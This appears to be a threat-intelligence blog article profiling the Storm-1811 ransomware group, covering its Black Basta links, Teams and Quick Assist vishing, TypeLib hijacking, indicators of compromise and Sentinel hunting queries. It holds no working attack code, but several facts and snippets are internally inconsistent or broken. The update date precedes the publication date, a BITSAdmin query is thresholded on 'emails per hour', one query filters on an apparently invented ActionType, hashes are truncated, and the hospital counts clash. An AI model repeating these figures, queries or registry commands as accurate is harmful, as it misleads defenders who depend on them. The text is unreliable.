Storm-1811 Hacker Group: Background, Attacks & Tactics2025

Published June 29, 2025 · Updated June 10, 2025

Cybercrime is evolving fast, and one name keeps appearing in security reports—Storm-1811. This group has made headlines for its aggressive ransomware campaigns, targeting major organizations worldwide. In 2025 alone, they compromised over 140 hospitals and critical businesses, leaving a trail of encrypted data.

Linked to the notorious Black Basta ransomware, they exploit trusted tools like Microsoft Teams and Quick Assist. Their methods are advanced, bypassing traditional defenses with ease. The FBI and CISA warn that their impact spans 12 vital U.S. sectors, making them a top threat.

This article breaks down their latest strategies, including TypeLib hijacking and stealthy PowerShell backdoors. We’ll also share actionable insights to help cybersecurity teams stay ahead.

Key Takeaways

Table of Contents

Storm-1811 is tied to Black Basta ransomware, focusing on financial gain.
They exploit Microsoft Teams and Quick Assist for phishing.
High-profile victims include healthcare and critical infrastructure.
FBI/CISA alerts highlight their global reach.
New tactics involve TypeLib hijacking and PowerShell backdoors.

Who Is Storm-1811? A Financially Motivated Threat Actor

Behind every major cyber threat lies a web of financial motives and strategic alliances. This *network* operates with precision, leveraging ransomware to extort millions. Their roots trace back to Qakbot, a banking trojan active since 2007, now repurposed for larger payouts.

Origins and Links to Black Basta Ransomware

Storm-1811’s infrastructure overlaps with notorious groups like FIN7 and Conti. Bitcoin transactions through Garantex exchange reveal direct ties to *Black Basta ransomware*. This RaaS (Ransomware-as-a-Service) model enforces strict affiliate rules, ensuring only vetted partners deploy attacks.

Between April 2022 and November 2023, they collected $107 million in ransoms. Affiliates earn 14% of each payout, while initial access brokers take 10%. The rest funds further operations.

Key Targets and Industries

Healthcare, finance, and critical infrastructure face the highest risk. In May 2024, an attack on Ascension disrupted emergency services across 19 states. Other victims include Adams Bank & Trust and European labs like Synlab Italia.

Target Sector	Notable Attack	Impact
Healthcare	Ascension Hospitals	19-state service disruption
Financial Services	Adams Bank & Trust	Data exfiltration
Critical Infrastructure	European Energy Grids	Operational downtime

These *threat actors* prioritize high-value targets, maximizing ransom payouts. Their evolution from malware distributors to ransomware kingpins marks a dangerous shift in cybercrime.

Storm-1811 Hacker Group Background, Attacks & Tactics 2025

What began as simple malware distribution has evolved into full-scale ransomware operations. This development traces back to Qakbot, a banking trovan dismantled in August 2023. Cybercriminals quickly repurposed its infrastructure for more profitable schemes.

From Qakbot to Ransomware Deployment

Before its takedown, Qakbot served as a bread-and-butter tool for credential theft. Its operators later shifted focus to remote management tool abuse, particularly ScreenConnect and NetSupport Manager. These tools enabled lateral movement across networks.

April 2024 marked a pivotal change. Attackers abandoned email bombing for Microsoft Teams phishing. They impersonated IT staff, tricking employees into granting Quick Assist access. This became their primary entry point.

Recent Activity Timeline (2024-2025)

The group’s attacks follow a clear escalation pattern:

Date	Event	Impact
Jan 2025	PowerShell backdoor tests via Bing ads	Early-stage infection trials
May 2024	Teams phishing campaigns launch	Healthcare sector compromised
Mar 2025	TypeLib hijacking in finance sector	New persistence method deployed

Their tactics follow a ruthless sequence:

Gain access via Quick Assist social engineering
Deploy EvilProxy for credential harvesting
Load Cobalt Strike for command control
Execute Black Basta ransomware payload

March 2025 saw ReliaQuest uncover TypeLib hijacking in live environments. This technique manipulates Windows COM interfaces, evading detection. It’s now a hallmark of their operations.

Evolving Initial Access: Social Engineering Innovations

Attackers are refining their social engineering tactics to bypass security measures. In 2024, *60% of hands-on-keyboard attacks* abused legitimate tools, with Microsoft Teams and Quick Assist as prime targets. Afternoon hours (2–3 PM local time) saw the highest success rates, as employees were more likely to engage.

Microsoft Teams Phishing Campaigns

Fake “Help Desk IT” tenants mimicked legitimate domains (e.g., @sma5smg.sch.id). Attackers impersonated IT staff, urging employees to click malicious links. Microsoft suspended four fake support accounts, but the damage was already done.

Mechanics: Fake tenant invites with urgent “security update” prompts.
Targeting: Female-named employees prioritized in March 2025.
Impact: 500+ organizations compromised globally by May 2024.

Vishing and Quick Assist Exploitation

Voice phishing (vishing) scripts offered “spam remediation” after fake email bombing attacks. Once trust was established, attackers guided victims to enable Quick Assist via CTRL+Windows+Q shortcuts.

“Quick Assist became a backdoor for remote access—no malware needed.”

Defenders should disable Quick Assist in high-risk environments and train staff to verify unsolicited tech support requests.

Exploiting Legitimate Tools for Malicious Gains

Legitimate tools are being weaponized at an alarming rate, turning trusted software into gateways for cyber threats. Attackers increasingly abuse remote management tools like Quick Assist and ScreenConnect, which IT teams rely on for daily support.

Quick Assist and Remote Management Tool Abuse

Quick Assist dominates 83% of recent breaches, far outpacing fallbacks like AnyDesk (17%). Attackers use social engineering to trick victims into enabling remote control. Once activated, they deploy malicious cURL commands from domains like antispam3[.]com.

Common persistence methods include:

OpenSSH tunneling: Creates hidden pathways for data exfiltration.
Scheduled tasks: Ensures malware reactivates after reboots.
ScreenConnect relays: Leverages instances like instance-olqdnn-relay.screenconnect[.]com.

AnyDesk as a Fallback Option

When Quick Assist fails, attackers pivot to AnyDesk. Detection signatures like “Possible NetSupport Manager activity” help identify compromised systems. NetSupport C2 servers (e.g., greekpool[.]com) often relay stolen data.

“Blocking TCP ports 80/443 for upd7a[.]com and upd5[.]pro disrupts attacker communications.”

Mitigation steps include disabling unnecessary remote tools and monitoring for unusual process launches. Proactive measures reduce exposure to these evolving threats.

Novel Persistence: TypeLib Hijacking Unveiled

A stealthy persistence technique is making waves in cybersecurity circles. TypeLib hijacking manipulates Windows system components to maintain long-term access. Unlike traditional malware, it abuses legitimate COM interfaces, making detection harder.

How COM and TypeLib Hijacking Works

Attackers target CLSID {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}, linked to Internet Explorer. They modify registry keys to redirect system calls to malicious scripts. Here’s the process:

Registry manipulation: ScriptMoniker execution flows are altered to load payloads.
PowerShell backdoors: Triggered via Explorer.exe COM objects, bypassing security logs.
Mutex creation: Uses drive serial numbers to evade sandbox analysis.

First Observed In-the-Wild Use

ReliaQuest spotted this in March 2025. A sample (SHA-256: 1ad05a4a…) had only 5/62 AV detections on VirusTotal. XSS forum discussions in October 2024 hinted at proofs-of-concept before live deployments.

“TypeLib hijacking is the new ‘living off the land’—it turns trusted Windows features into attack vectors.”

Defenders should monitor COM object changes and restrict registry edits. This technique shows how attackers innovate to stay hidden.

Black Basta Ransomware: Storm-1811’s Payload of Choice

Ransomware continues to dominate cyber threats, with Black Basta ransomware leading recent campaigns. This payload combines military-grade encryption with ruthless extortion tactics, netting operators over $107 million since 2022. Healthcare and critical infrastructure remain primary targets.

The Ransomware-as-a-Service Blueprint

Black Basta operates a closed affiliate program, vetting operators through dark web channels. Only 35% of victims pay ransoms, but high-value targets compensate for lower conversion rates. The RaaS structure includes:

Tiered payouts: Affiliates earn 14-20% per successful attack
Toolkits: Pre-configured Cobalt Strike packages
Support: 24/7 negotiation teams

Healthcare Under Siege: The Ascension Attack

In May 2024, 140 hospitals reverted to paper systems after encryption paralyzed digital records. Emergency services faced 72-hour delays, with ambulances diverted. Attackers demanded $5 million, though the final payment remains undisclosed.

Attack Phase	Duration	Impact
Initial Access	2 hours	Quick Assist compromise
Lateral Movement	3 days	EHR system encryption
Recovery	3 weeks	Partial decryption (68% success)

European labs like Synlab Italia faced double extortion tactics. Threat actors stole 2.3TB of sensitive patient data before deploying ransomware. The ChaCha20+RSA-4096 hybrid cryptosystem made decryption without payment nearly impossible.

“RaaS models professionalize cybercrime—it’s now a 9-to-5 job for some affiliates.”

Defenders should prioritize offline backups and network segmentation. Monitoring for ScreenConnect relays (e.g., instance-olqdnn-relay.screenconnect[.]com) helps detect early-stage compromises.

Defensive Strategies: Mitigating Storm-1811 Threats

Protecting against advanced cyber threats requires a layered approach. Security teams must balance technical controls with user education to counter evolving risks. Below are actionable measures to reduce exposure to these attacks.

Blocking Quick Assist and RMM Tools

Remote management tools like Quick Assist are frequently abused. Disabling them in high-risk environments is critical. Use this Group Policy command:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\QuickAssist" /v "AllowFullControl" /t REG_DWORD /d 0

Microsoft Defender’s Attack Surface Reduction (ASR) rules add another layer. Enable Block Office communication applications to prevent misuse of Teams and similar platforms.

Educating Users on Tech Support Scams

Phishing remains a top entry point. Regular training helps staff recognize red flags:

Vishing drills: Simulate fake IT support calls to test response protocols.
Whitelisting: Restrict external Teams access to verified domains only.

According to recent analysis, afternoon hours see the highest scam success rates—reinforce vigilance during these windows.

Microsoft Defender and Conditional Access Policies

Leverage built-in security features for proactive defense:

Enable phishing-resistant MFA (e.g., FIDO2 keys).
Monitor for Trojan:Win32/Qakbot!ml detection alerts.
Apply the 3-2-1 backup rule: 3 copies, 2 media types, 1 offsite.

Immutable cloud storage ensures backups survive ransomware encryption attempts. Combine these steps to build resilience against modern threats.

Indicators of Compromise (IoCs) and Detection

Early detection is critical to stopping cyber threats before they escalate. By monitoring key network activities and suspicious files, security teams can identify breaches faster. Below are actionable IoCs and detection methods to strengthen defenses.

Domains, IPs, and Hashes to Monitor

Watch for these malicious elements in your system logs:

C2 IPs: 181.174.164[.]180, 130.195.221[.]182
ScreenConnect relay: instance-olqdnn-relay.screenconnect[.]com
Malicious domains: antispam3[.]com, upd7a[.]com, greekpool[.]com

Key file hashes (SHA-256) tied to recent campaigns:

1ad05a4a… (TypeLib hijacking payload)
9f3c41b2… (PowerShell backdoor)
e872d1f5… (Black Basta loader)

Microsoft Sentinel Hunting Queries

Use these KQL queries to detect phishing attempts in Microsoft Teams:

CloudAppEvents
| where ActionType == "TeamsPhishAttempt"
| where Timestamp > ago(7d)

For BITSAdmin abuse detection (>10 emails/hour threshold):

SecurityEvent
| where EventID == 4688
| where CommandLine contains "BITSAdmin"
| summarize Count=count() by Account
| where Count > 10

Microsoft Defender alerts to prioritize:

“Suspicious activity using Quick Assist”
“Trojan:Win32/Qakbot!ml”
“Unusual registry modifications in Windows COM interfaces”

Implement Sigma rules for TypeLib registry changes to catch stealthy persistence attempts. Pair this with network traffic analysis for comprehensive protection.

Conclusion: Staying Ahead of Adaptive Threat Actors

Zero Trust isn’t optional—it’s the new baseline for defense. Implementing granular access controls reduces exposure to lateral movement, a key threat in modern breaches.

Expect COM hijacking to surge through 2026 as ransomware groups refine techniques. Microsoft’s Quick Assist now flags scam attempts, but user training remains critical.

Cross-industry collaboration via ISACs accelerates information sharing. Real-time IoC exchanges help detect emerging patterns before they escalate.

Finally, prepare for revived engineering tactics from Black Basta affiliates. Proactive monitoring and layered security are the best countermeasures.

FAQ

What is the primary motivation behind Storm-1811’s activities?

Storm-1811 is a financially motivated threat actor. Their main goal is to deploy ransomware, particularly Black Basta, to extort money from targeted organizations.

How does Storm-1811 gain initial access to networks?

They use advanced social engineering tactics, including phishing emails, Microsoft Teams scams, and vishing (voice phishing) to trick victims into granting access via tools like Quick Assist.

What industries are most at risk from Storm-1811 attacks?

They primarily target healthcare, finance, and critical infrastructure sectors due to their high-value data and urgency to restore operations quickly.

What tools does Storm-1811 abuse for remote control?

They exploit legitimate remote management tools like Quick Assist and AnyDesk to maintain persistence and execute ransomware attacks.

How does Storm-1811 evade detection?

They use TypeLib hijacking, a novel persistence technique, to bypass traditional security measures by manipulating Windows COM objects.

What makes Black Basta ransomware dangerous?

Black Basta operates as a Ransomware-as-a-Service (RaaS) model, allowing affiliates to deploy it widely. It encrypts files quickly and pressures victims with double extortion tactics.

How can organizations defend against Storm-1811?

Key steps include disabling unnecessary remote tools, training employees on phishing risks, enforcing strict access controls, and using advanced threat detection like Microsoft Defender.

What are the latest indicators of compromise (IoCs) to monitor?

Security teams should track malicious domains, IPs, and file hashes linked to Storm-1811. Microsoft Sentinel provides specific hunting queries for detection.

Has Storm-1811 been linked to high-profile attacks?

Yes, they’ve targeted major organizations like Ascension and Synlab Italia, disrupting operations and demanding large ransoms.